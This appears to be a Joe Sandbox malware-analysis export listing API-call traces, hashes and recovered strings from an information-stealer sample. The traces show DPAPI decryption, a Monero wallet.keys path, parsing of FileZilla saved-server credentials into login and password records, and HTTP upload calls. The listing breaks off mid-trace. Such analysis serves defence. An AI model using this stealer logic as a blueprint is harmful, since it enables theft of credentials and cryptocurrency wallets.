                              • Opcode Fuzzy Hash: 3fc7ecaff79c10b07ea69e1388d288a82c64fda2a12f4327755752ad023208ab
                              • Instruction Fuzzy Hash: DF4140B590421ADFDB10DFA4DD89BEEF7B8BB48704F1041A8E609B7280D7B55A84CF91
                              APIs
                              • GetSystemTime.KERNEL32(?), ref: 0013696C
                              • sscanf.NTDLL ref: 00136999
                              • SystemTimeToFileTime.KERNEL32(?,00000000), ref: 001369B2
                              • SystemTimeToFileTime.KERNEL32(?,00000000), ref: 001369C0
                              • ExitProcess.KERNEL32 ref: 001369DA
                              Memory Dump Source
                              • Source File: 00000000.00000002.1815930346.0000000000121000.00000040.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
                              • Associated: 00000000.00000002.1815913744.0000000000120000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1815930346.00000000001D1000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1815930346.00000000001DD000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1815930346.0000000000202000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1815930346.000000000036A000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1816070197.000000000037E000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1816070197.000000000050A000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1816070197.00000000005E7000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1816070197.0000000000608000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1816070197.000000000060F000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1816070197.000000000061E000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1816583562.000000000061F000.00000080.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1816913937.00000000007BD000.00000040.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_120000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: Time$System$File$ExitProcesssscanf
                              • String ID:
                              • API String ID: 2533653975-0
                              • Opcode ID: d60cccd9c2144e3fe9e997b84254e0b2a2617d100dffcd8be17a4234283f1b1e
                              • Instruction ID: 362fc58acba6113489f9a8793d8a2b8a493f7c72814477dc0c0a0d98de1b6306
                              • Opcode Fuzzy Hash: d60cccd9c2144e3fe9e997b84254e0b2a2617d100dffcd8be17a4234283f1b1e
                              • Instruction Fuzzy Hash: 0821E9B5D00208AFCF05EFE4D945AEEBBB9BF48300F04856AE406F3250EB745604CBA9
                              APIs
                              • GetProcessHeap.KERNEL32(00000008,00000400), ref: 0012724D
                              • RtlAllocateHeap.NTDLL(00000000), ref: 00127254
                              • CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000001,?), ref: 00127281
                              • WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,?,00000400,00000000,00000000), ref: 001272A4
                              • LocalFree.KERNEL32(?), ref: 001272AE
                              Memory Dump Source
                              • Source File: 00000000.00000002.1815930346.0000000000121000.00000040.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
                              • Associated: 00000000.00000002.1815913744.0000000000120000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1815930346.00000000001D1000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1815930346.00000000001DD000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1815930346.0000000000202000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1815930346.000000000036A000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1816070197.000000000037E000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1816070197.000000000050A000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1816070197.00000000005E7000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1816070197.0000000000608000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1816070197.000000000060F000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1816070197.000000000061E000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1816583562.000000000061F000.00000080.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1816913937.00000000007BD000.00000040.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_120000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: Heap$AllocateByteCharCryptDataFreeLocalMultiProcessUnprotectWide
                              • String ID:
                              • API String ID: 2609814428-0
                              • Opcode ID: 681203c498063b16d3d3cc00c0f024780ed2603c00896c7955e9ebd8d61fa440
                              • Instruction ID: 5847988b458b6ae84ee6490667c59c53c6e4e8377666f5356d05359ae0decdfb
                              • Opcode Fuzzy Hash: 681203c498063b16d3d3cc00c0f024780ed2603c00896c7955e9ebd8d61fa440
                              • Instruction Fuzzy Hash: AF011275A44208BBDB14DFD4DD45F9E7BB8EB44704F108158FB05BB2C0D7B0AA008B65
                              APIs
                              • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 0013961E
                              • Process32First.KERNEL32(00140ACA,00000128), ref: 00139632
                              • Process32Next.KERNEL32(00140ACA,00000128), ref: 00139647
                              • StrCmpCA.SHLWAPI(?,00000000), ref: 0013965C
                              • CloseHandle.KERNEL32(00140ACA), ref: 0013967A
                              Memory Dump Source
                              • Source File: 00000000.00000002.1815930346.0000000000121000.00000040.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
                              • Associated: 00000000.00000002.1815913744.0000000000120000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1815930346.00000000001D1000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1815930346.00000000001DD000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1815930346.0000000000202000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1815930346.000000000036A000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1816070197.000000000037E000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1816070197.000000000050A000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1816070197.00000000005E7000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1816070197.0000000000608000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1816070197.000000000060F000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1816070197.000000000061E000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1816583562.000000000061F000.00000080.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1816913937.00000000007BD000.00000040.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_120000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32
                              • String ID:
                              • API String ID: 420147892-0
                              • Opcode ID: 88122ffbb3d4b0d7bf453696e55ea41f6c4b77d61003ccdcc813b9386d627c4c
                              • Instruction ID: 3edae1e8f62b6e73cc3241cfb8baffce8ae030b9dd094dcc89063519ea017851
                              • Opcode Fuzzy Hash: 88122ffbb3d4b0d7bf453696e55ea41f6c4b77d61003ccdcc813b9386d627c4c
                              • Instruction Fuzzy Hash: E9011EB5A01208EBCB15DFA5CD49BEDBBF8EB48300F108188E909A7250E7B4AB40DF51
                              APIs
                              • CryptBinaryToStringA.CRYPT32(00000000,00125184,40000001,00000000,00000000,?,00125184), ref: 00138EC0
                              Memory Dump Source
                              • Source File: 00000000.00000002.1815930346.0000000000121000.00000040.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_120000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: BinaryCryptString
                              • String ID:
                              • API String ID: 80407269-0
                              • Opcode ID: 82b0d5485494e6a6cc2e784371c42da060a7a89b35c8e596adaf56307e6babd8
                              • Instruction ID: 7a21b8ce29f47e9c068e362a5d468760735ccacea5f86b5f6aa31d0ebbe5e4da
                              • Opcode Fuzzy Hash: 82b0d5485494e6a6cc2e784371c42da060a7a89b35c8e596adaf56307e6babd8
                              • Instruction Fuzzy Hash: AA11E274200309BFDB04CFA4E889FAB37AEAF89714F109558F9198B250DB76ED41DB60
                              APIs
                              • CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,00124EEE,00000000,00000000), ref: 00129AEF
                              • LocalAlloc.KERNEL32(00000040,?,?,?,00124EEE,00000000,?), ref: 00129B01
                              • CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,00124EEE,00000000,00000000), ref: 00129B2A
                              • LocalFree.KERNEL32(?,?,?,?,00124EEE,00000000,?), ref: 00129B3F
                              Memory Dump Source
                              • Source File: 00000000.00000002.1815930346.0000000000121000.00000040.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_120000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: BinaryCryptLocalString$AllocFree
                              • String ID:
                              • API String ID: 4291131564-0
                              • Opcode ID: 31e1e5215006a41b034c6a192635eb2be9acf8aa2e31febbe45b411cdda9331c
                              • Instruction ID: 67ed3dafb67d0a7fedddcb1e82be47ae590effd6e0680059dc5d6bfbb7d2511b
                              • Opcode Fuzzy Hash: 31e1e5215006a41b034c6a192635eb2be9acf8aa2e31febbe45b411cdda9331c
                              • Instruction Fuzzy Hash: 1111A4B4240208AFEB11CF64DC95FAA77B9FB89700F208058F9159B390C7B5A901DB90
                              APIs
                              • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,00000000,00000000,?,00FFE620,00000000,?,00140E10,00000000,?,00000000,00000000), ref: 00137A63
                              • RtlAllocateHeap.NTDLL(00000000), ref: 00137A6A
                              • GetTimeZoneInformation.KERNEL32(?,?,?,?,00000000,00000000,?,00FFE620,00000000,?,00140E10,00000000,?,00000000,00000000,?), ref: 00137A7D
                              • wsprintfA.USER32 ref: 00137AB7
                              Memory Dump Source
                              • Source File: 00000000.00000002.1815930346.0000000000121000.00000040.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_120000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: Heap$AllocateInformationProcessTimeZonewsprintf
                              • String ID:
                              • API String ID: 3317088062-0
                              • Opcode ID: 07dbd31f6fe09f204cf9fabaa7cb539cf27b7649d478801fb2e43ac2c60c1f38
                              • Instruction ID: fc0b8ddb439fc33d1b45ecd01425a5b76859a9b5b7cb31ea09802831848f10bc
                              • Opcode Fuzzy Hash: 07dbd31f6fe09f204cf9fabaa7cb539cf27b7649d478801fb2e43ac2c60c1f38
                              • Instruction Fuzzy Hash: 8A118EB1945618EBEB208B54DC49FA9BBB8FB04721F10479AE90AA32C0C7741A40CF51
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.1816070197.000000000037E000.00000040.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
                               • Associated: 00000000.00000002.1815913744.0000000000120000.00000004.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1815930346.0000000000121000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1815930346.00000000001D1000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1815930346.00000000001DD000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1815930346.0000000000202000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1815930346.000000000036A000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1816070197.000000000050A000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1816070197.00000000005E7000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1816070197.0000000000608000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1816070197.000000000060F000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1816070197.000000000061E000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1816583562.000000000061F000.00000080.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1816913937.00000000007BD000.00000040.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_120000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID:
                              • String ID: B_w$`bw{$q+,$u%>I
                              • API String ID: 0-1763919940
                              • Opcode ID: b14f048a9064c45e76387ea2ee3b44a033d2bc9f94c8e1d01dd941dc2fcd3838
                              • Instruction ID: c35c07104c3b618c672736fcf21167e2582b1d968f1678ee3491be6f935f9edd
                              • Opcode Fuzzy Hash: b14f048a9064c45e76387ea2ee3b44a033d2bc9f94c8e1d01dd941dc2fcd3838
                              • Instruction Fuzzy Hash: CF52F8F360C2049FE704AE2DEC8567AB7E9EB94320F168A3DE6C5C3744E63598058697
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.1816070197.000000000037E000.00000040.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_120000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID:
                              • String ID: 1&:/$Q{_$t49}
                              • API String ID: 0-3721954467
                              • Opcode ID: c8649177da497b9ff7bda3921e868ad952610abb6b5eae5ad9ac3f78659d95cc
                              • Instruction ID: e6f4996abb6025ec58a3d5fe511eb3658fbcebebd60443b5f4271dd5a5095718
                              • Opcode Fuzzy Hash: c8649177da497b9ff7bda3921e868ad952610abb6b5eae5ad9ac3f78659d95cc
                              • Instruction Fuzzy Hash: 2BB22AF3A082049FE304AE2DEC8567ABBE6EFD4720F1A453DE6C4C7744EA3558058697
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.1816070197.000000000037E000.00000040.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_120000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID:
                              • String ID: 2*O$E>}D$~p.
                              • API String ID: 0-1836780756
                              • Opcode ID: 664d2ae31339c961b8e9fe6ae22e13743eca4a7c2aafda7c3c4e096c038e020f
                              • Instruction ID: eedba23a93f1d87ddc373040d7a5c8dc183887d5fb6451470e05f3b3785af908
                              • Opcode Fuzzy Hash: 664d2ae31339c961b8e9fe6ae22e13743eca4a7c2aafda7c3c4e096c038e020f
                              • Instruction Fuzzy Hash: 37B2D5F360C210AFE3146E29EC8567ABBE9EF94720F1A493DE6C4C3744EA3548458797
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.1816070197.000000000037E000.00000040.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_120000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID:
                              • String ID: U\?]$zWW$;zN
                              • API String ID: 0-2559165817
                              • Opcode ID: 178a90f82a3d6145a6ca01c774146b21f4e1599e3a6db518bd1e3fc34e7a6e7a
                              • Instruction ID: 9819c0a73aafeab96a336697606d16a3de4457a6a62f2d93551bc9ddac856d1b
                              • Opcode Fuzzy Hash: 178a90f82a3d6145a6ca01c774146b21f4e1599e3a6db518bd1e3fc34e7a6e7a
                              • Instruction Fuzzy Hash: 77B23AF3A082149FE3046E2DEC8567AFBE9EFD4320F1A853EEAC4D3744E53558058696
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.1816070197.000000000037E000.00000040.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_120000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID:
                              • String ID: _Zk$rez$%[u
                              • API String ID: 0-431288570
                              • Opcode ID: e61b88d9041dc11153ea2ff9407be1dce59acfb1a474f1c8d0da78c16f563ae4
                              • Instruction ID: a5e73983989669365d263a8c8f5af4b378cb97a97e7432f57341b7a64fcad66f
                              • Opcode Fuzzy Hash: e61b88d9041dc11153ea2ff9407be1dce59acfb1a474f1c8d0da78c16f563ae4
                              • Instruction Fuzzy Hash: 489239F3A086049FE304AE2DDC8567AFBE5EF94720F1A893DEAC4C7744E63558058693
                              APIs
                              • CoCreateInstance.COMBASE(0013E118,00000000,00000001,0013E108,00000000), ref: 00133758
                              • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,00000104), ref: 001337B0
                              Memory Dump Source
                              • Source File: 00000000.00000002.1815930346.0000000000121000.00000040.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_120000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: ByteCharCreateInstanceMultiWide
                              • String ID:
                              • API String ID: 123533781-0
                              • Opcode ID: 07454e2132b0b92d1914b5b57545cdca4c3ee7b922c021d05b06dd4b5292ff45
                              • Instruction ID: e1f689fa069158809c4d53d1e8600c956cc7fc5397f1e1b0ea5e8f3b9c9138ab
                              • Opcode Fuzzy Hash: 07454e2132b0b92d1914b5b57545cdca4c3ee7b922c021d05b06dd4b5292ff45
                              • Instruction Fuzzy Hash: F741C970A40A189FDB24DB58CC95F9BB7B5BB48702F4082D8E619A72D0D7B16E85CF50
                              APIs
                              • CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000000,?), ref: 00129B84
                              • LocalAlloc.KERNEL32(00000040,00000000), ref: 00129BA3
                              • LocalFree.KERNEL32(?), ref: 00129BD3
                              Memory Dump Source
                              • Source File: 00000000.00000002.1815930346.0000000000121000.00000040.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_120000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: Local$AllocCryptDataFreeUnprotect
                              • String ID:
                              • API String ID: 2068576380-0
                              • Opcode ID: 272ad570dfece7388f6084ac7dfa5034ecbaf6b4a45aefbf29492b65d201aa03
                              • Instruction ID: b4ae5f285e26388bbacfa44371ec4b899352170e24847bdcc93d557e4e65b866
                              • Opcode Fuzzy Hash: 272ad570dfece7388f6084ac7dfa5034ecbaf6b4a45aefbf29492b65d201aa03
                              • Instruction Fuzzy Hash: 4C11BAB8A00209DFDB05DF98D989EAE77B9FF88300F104558E915A7350D774AE10CFA1
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.1816070197.000000000037E000.00000040.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_120000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID:
                              • String ID: P8BJ$W@xi$'|
                              • API String ID: 0-522130173
                              • Opcode ID: cbb6557f282ab2afd1e003b23ee59edd906bcf8b79764081b6735c607afb5c88
                              • Instruction ID: 231d762a7cd3bce7164dd472397dde4218fd157b4e3b6947c7183fe54e4d889b
                              • Opcode Fuzzy Hash: cbb6557f282ab2afd1e003b23ee59edd906bcf8b79764081b6735c607afb5c88
                              • Instruction Fuzzy Hash: 2F220AF360C2049FE704AE29EC4577ABBE6EBD4320F168A3DE6C4C7744E63598058697
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.1816070197.000000000037E000.00000040.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_120000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID:
                              • String ID: _FZ&$t^}?
                              • API String ID: 0-1753847426
                              • Opcode ID: 71554f8134de3ab14d6fb37f8e590b908f1d3c62a9ec63d5b1b3f6dbbb2c8455
                              • Instruction ID: 115cb71315a0e1a78419d5b1120d3f4d8a2be08f00f87f5dab3570a6655d1adb
                              • Opcode Fuzzy Hash: 71554f8134de3ab14d6fb37f8e590b908f1d3c62a9ec63d5b1b3f6dbbb2c8455
                              • Instruction Fuzzy Hash: F2B2F7F3A082009FD3146E2DDC8577AFBE9EF94720F1A4A2DEAC4C7744E63558058697
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.1816070197.000000000037E000.00000040.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_120000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID:
                              • String ID: Uo@_$d=/G
                              • API String ID: 0-952508118
                              • Opcode ID: b4ba13db02caf53e63d8efff6033a8893e6982749840d035e2baba7360fef18e
                              • Instruction ID: 11ac09b6bb758cfe8c6cbfde192feabcb4f61fda436f5462e0449ae0940a343e
                              • Opcode Fuzzy Hash: b4ba13db02caf53e63d8efff6033a8893e6982749840d035e2baba7360fef18e
                              • Instruction Fuzzy Hash: 9D51E7F3F041005FF3049A2DDC8576AB7E6EBD4320F1A863DEA98D3788E9399D054296
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.1816070197.000000000037E000.00000040.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_120000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID:
                              • String ID: 0R9{
                              • API String ID: 0-1996814445
                              • Opcode ID: 732ff30cc760373cca01c43c117a12191e6f306bd560122f3d84281183ce0dd7
                              • Instruction ID: c5ce0fd12ada907f752df5ec696f51e2e8be02a3af1c5a4442a616a90a20c1b9
                              • Opcode Fuzzy Hash: 732ff30cc760373cca01c43c117a12191e6f306bd560122f3d84281183ce0dd7
                              • Instruction Fuzzy Hash: 3A5158F3E082044BE3146E2DEC4576AB7DADFD0720F1B863E9AD487784ED35680586C6
                              Memory Dump Source
                              • Source File: 00000000.00000002.1815930346.0000000000121000.00000040.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_120000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: eecc59efbe9cdf3acfc8abb57b86a9aab05cbe8bc62256deaf8fcc3308cb31aa
                              • Instruction ID: abbdd297b848902a35704da264ecc4a7d2e6ec457c67c65f9fa5c7ab4ebdfac4
                              • Opcode Fuzzy Hash: eecc59efbe9cdf3acfc8abb57b86a9aab05cbe8bc62256deaf8fcc3308cb31aa
                              • Instruction Fuzzy Hash: 1EE04878A56608EFC740CF88D584E49B7F8EB0D720F1181D5ED099B721D235EE00EA90
                              APIs
                                • Part of subcall function 0013A740: lstrcpy.KERNEL32(00140E17,00000000), ref: 0013A788
                                • Part of subcall function 00138DE0: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 00138E0B
                                • Part of subcall function 0013A920: lstrcpy.KERNEL32(00000000,?), ref: 0013A972
                                • Part of subcall function 0013A920: lstrcat.KERNEL32(00000000), ref: 0013A982
                                • Part of subcall function 0013A8A0: lstrcpy.KERNEL32(?,00140E17), ref: 0013A905
                                • Part of subcall function 0013A9B0: lstrlen.KERNEL32(?,00FF90A8,?,\Monero\wallet.keys,00140E17), ref: 0013A9C5
                                • Part of subcall function 0013A9B0: lstrcpy.KERNEL32(00000000), ref: 0013AA04
                                • Part of subcall function 0013A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0013AA12
                                • Part of subcall function 0013A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0013A7E6
                                • Part of subcall function 001299C0: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 001299EC
                                • Part of subcall function 001299C0: GetFileSizeEx.KERNEL32(000000FF,?), ref: 00129A11
                                • Part of subcall function 001299C0: LocalAlloc.KERNEL32(00000040,?), ref: 00129A31
                                • Part of subcall function 001299C0: ReadFile.KERNEL32(000000FF,?,00000000,0012148F,00000000), ref: 00129A5A
                                • Part of subcall function 001299C0: LocalFree.KERNEL32(0012148F), ref: 00129A90
                                • Part of subcall function 001299C0: CloseHandle.KERNEL32(000000FF), ref: 00129A9A
                                • Part of subcall function 00138E30: LocalAlloc.KERNEL32(00000040,-00000001), ref: 00138E52
                              • GetProcessHeap.KERNEL32(00000000,000F423F,00140DBA,00140DB7,00140DB6,00140DB3), ref: 00130362
                              • RtlAllocateHeap.NTDLL(00000000), ref: 00130369
                              • StrStrA.SHLWAPI(00000000,<Host>), ref: 00130385
                              • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00140DB2), ref: 00130393
                              • StrStrA.SHLWAPI(00000000,<Port>), ref: 001303CF
                              • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00140DB2), ref: 001303DD
                              • StrStrA.SHLWAPI(00000000,<User>), ref: 00130419
                              • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00140DB2), ref: 00130427
                              • StrStrA.SHLWAPI(00000000,<Pass encoding="base64">), ref: 00130463
                              • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00140DB2), ref: 00130475
                              • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00140DB2), ref: 00130502
                              • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00140DB2), ref: 0013051A
                              • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00140DB2), ref: 00130532
                              • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00140DB2), ref: 0013054A
                              • lstrcat.KERNEL32(?,browser: FileZilla), ref: 00130562
                              • lstrcat.KERNEL32(?,profile: null), ref: 00130571
                              • lstrcat.KERNEL32(?,url: ), ref: 00130580
                              • lstrcat.KERNEL32(?,00000000), ref: 00130593
                              • lstrcat.KERNEL32(?,00141678), ref: 001305A2
                              • lstrcat.KERNEL32(?,00000000), ref: 001305B5
                              • lstrcat.KERNEL32(?,0014167C), ref: 001305C4
                              • lstrcat.KERNEL32(?,login: ), ref: 001305D3
                              • lstrcat.KERNEL32(?,00000000), ref: 001305E6
                              • lstrcat.KERNEL32(?,00141688), ref: 001305F5
                              • lstrcat.KERNEL32(?,password: ), ref: 00130604
                              • lstrcat.KERNEL32(?,00000000), ref: 00130617
                              • lstrcat.KERNEL32(?,00141698), ref: 00130626
                              • lstrcat.KERNEL32(?,0014169C), ref: 00130635
                              • lstrlen.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00140DB2), ref: 0013068E
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.1815930346.0000000000121000.00000040.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_120000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: lstrcat$lstrlen$lstrcpy$FileLocal$AllocHeap$AllocateCloseCreateFolderFreeHandlePathProcessReadSize
                              • String ID: <Host>$<Pass encoding="base64">$<Port>$<User>$\AppData\Roaming\FileZilla\recentservers.xml$browser: FileZilla$login: $password: $profile: null$url:
                              • API String ID: 1942843190-555421843
                              • Opcode ID: a6358ab1c9aae06d5ff3da466fd112d1dce68b9c546b76e58d5abdf80bf1ff1d
                              • Instruction ID: f3cf749e1d42023d62365ded3be20c1742fdf4aad68565da6a49c194304666d7
                              • Opcode Fuzzy Hash: a6358ab1c9aae06d5ff3da466fd112d1dce68b9c546b76e58d5abdf80bf1ff1d
                              • Instruction Fuzzy Hash: 05D13072900208ABDB05EBF4DD96EEE777CAF28301F848458F142B7091DF75AA49DB61
                              APIs
                                • Part of subcall function 0013A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0013A7E6
                                • Part of subcall function 001247B0: lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 00124839
                                • Part of subcall function 001247B0: InternetCrackUrlA.WININET(00000000,00000000), ref: 00124849
                                • Part of subcall function 0013A740: lstrcpy.KERNEL32(00140E17,00000000), ref: 0013A788
                              • InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 001259F8
                              • StrCmpCA.SHLWAPI(?,00FFE7D8), ref: 00125A13
                              • InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00125B93
                              • lstrlen.KERNEL32(00000000,00000000,?,00000000,00000000,?,",00000000,?,00FFE808,00000000,?,00FFA930,00000000,?,00141A1C), ref: 00125E71
                              • lstrlen.KERNEL32(00000000), ref: 00125E82
                              • GetProcessHeap.KERNEL32(00000000,?), ref: 00125E93
                              • RtlAllocateHeap.NTDLL(00000000), ref: 00125E9A
                              • lstrlen.KERNEL32(00000000), ref: 00125EAF
                              • lstrlen.KERNEL32(00000000), ref: 00125ED8
                              • lstrlen.KERNEL32(00000000,00000000,00000000), ref: 00125EF1
                              • lstrlen.KERNEL32(00000000,?,?), ref: 00125F1B
                              • HttpSendRequestA.WININET(00000000,00000000,00000000), ref: 00125F2F
                              • InternetReadFile.WININET(00000000,?,000000C7,?), ref: 00125F4C
                              • InternetCloseHandle.WININET(00000000), ref: 00125FB0
